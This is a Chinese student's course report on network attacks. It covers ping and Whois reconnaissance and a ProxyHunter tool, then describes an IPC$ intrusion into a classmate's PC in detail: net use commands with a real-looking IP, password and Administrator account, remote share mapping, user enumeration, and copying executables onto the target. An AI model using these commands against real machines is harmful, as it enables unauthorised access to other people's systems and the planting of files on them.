信息对抗大作业Word文档格式.docx

信息对抗大作业Word文档格式.docx

《信息对抗大作业Word文档格式.docx》由会员分享，可在线阅读，更多相关《信息对抗大作业Word文档格式.docx（12页珍藏版）》请在冰豆网上搜索。

进入九十年代后，Internet走向了全世界。

于是，网络攻击成为了热点。

于是出现了黑客、红客、病毒等一系列新兴名词与产业。

计算机网络战是在计算机网络空间内进行的对抗，这种对抗形式是通过计算机通信网，特别是当前因特网，截取、利用、篡改、破坏对方的信息，利用假冒信息或病毒来危害对方的信息与信息设施，并同时保护己方的信息以信息基础，已达到预期目的的行动。

其包括：

网络攻击、网络防护和网络支援。

（一）、身份攻击

1、利用ping命令获取网站的的ip地址（以pingXX为例）

得到XX的ip地址为61.135.169.125

由于大的网站一般有多个web服务器,以避免一台服务器出现问题后网站不能正确运行的情况,二每台服务器的ip都不同，所以每次ping的结果并不一定相同。

示例：

2、利用Whois来搜索关于此ip的信息

（1）、关于Whois

Whois简单来说，就是一个用来查询域名是否已经被注册，以及注册域名的详细信息的数据库（如域名所有人、域名注册商、域名注册日期和过期日期等）。

通过域名Whois查询，可以查询域名归属者联系方式，以及注册和到期时间,可以等进行访问！

（2）、关于域名到期删除规则实施的解释：

国际域名：

到期当天暂停解析，如果在72小时未续费，则修改域名DNS指向广告页面（停放）。

38天内，可以自动续费。

续费后，系统自动恢复原来的DNS，刷新时间大概是24－48小时。

39-70天，域名处于赎回期（Redemption），此期间域名无法管理，需手工赎回！

75天，域名被彻底删除，可以重新注册。

国内域名：

到期当天暂停解析，如果在72小时未续费，则修改域名DNS指向广告页面（停放）。

35天内，可以自动续费。

过期后36－48天，将进入13天的高价赎回期，此期间域名无法管理。

过期后48天后仍未续费的，域名将随时被删除。

（3）Whois查询：

（二）、身份攻击

1、软件名称：

ProxyHunter

软件介绍：

代理服务器猎手，可以很快速的查找网络上的免费Proxy哦!

主要有以下特点：

支持多网址段、多端口自动查询，支持自动验证并给出速度评价，支持后续的再验证，支持用户设置连接超时和验证超时，支持用户设置验证内容，支持进度时间预测，支持用户设置最大连接数（可以作到不影响其他网络程序），支持自动查找最新版本，最大的特点是搜索速度快，最快可以在十几分钟内搜完整个B类地址的65536个地址。

同时代理服务器软件还可以隐藏自己的真实地址信息，可隐藏自己的IP，防止被黑客攻击。

但是由于校园网不需用代理服务器，用了之后校园网自己断了，所以这个计划破产了。

（三）、利用IPC$漏洞为基础的入侵攻击。

实验过程

一、获取对方主机账号与口令

所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机，然后再实施攻击活动。

这种方法的前提是必须先得到该主机上的某个合法用户的帐号，然后再进行合法用户口令的破译。

获得普通用户帐号的方法非常多，如：

1、利用目标主机的Finger功能：

当用Finger命令查询时，主机系统会将保存的用户资料（如用户名、登录时间等）显示在终端或计算机上；

2、利用目标主机的X.500服务：

有些主机没有关闭X.500的目录查询服务，也给攻击者提供了获得信息的一条简易途径；

3、从电子邮件地址中收集：

有些用户电子邮件地址常会透露其在目标主机上的帐号；

4、查看主机是否有习惯性的帐号：

有经验的用户都知道，非常多系统会使用一些习惯性的帐号，造成帐号的泄露。

由于本人的目标主机是同学的机子，所以没有使用这些有破坏性的方法，而是直接得到口令。

二、进行IPC$连接

在dos环境下，使用如下的命令：

netuse\\ip\ipc$"

口令"

/u:

"

用户名"

此次使用的命令是

netuse\\222.25.163.94\ipc$"

8110502123"

/use:

"

Administrator"

运行结果如下图：

三、操作对方主机

IPC$连接完成后就可以使用其他的命令来操作远程主机，如查看系统时间、NETBIOS用户列表等。

1、查看对方主机的当前系统时间

使用命令：

nettime\\IP

指令及运行结果如下：

2、查看远程主机的共享资源

使用命令：

netview\\IP

指令及运行结果如下：

3、得到远程主机的NetBIOS用户名列表

使用命令;

nbtstat-aIP

4、映射远程共享:

netusez:

\\IP\盘符$

此命令将共享名为baby的共享资源映射到z盘

使用命令及运行结果如下：

将同学的c盘映射到我的主机里

打开同学的c盘

由于是同学的电脑，就没做什么破坏，放过他吧。

5、删除共享映射

使用命令：

netusec:

/del删除映射的c盘，其他盘类推

netuse*/del/y删除全部

也可以之间点断开

断开之后

6、删除一条已建立的IPC$连接

netuse\\IP\ipc$/del

四、还可以利用IPC$做别的事情

常用到的命令如下：

1、查看远程主机的共享资源（但看不到默认共享）

netview\\IP

2、建立空连接:

netuse\\IP\ipc$"

/user:

3、查看本地主机的共享资源（可以看到本地的默认共享）

netshare

4、显示本地主机当前服务

netstart

5、启动/关闭本地服务

netstart服务名/y

netstop服务名/y

6、向远程主机复制文件

copy\路径\srv.exe\\IP\共享目录名，如：

copyccbirds.exe\\*.*.*.*\c即将当前目录下的文件复制到对方c盘内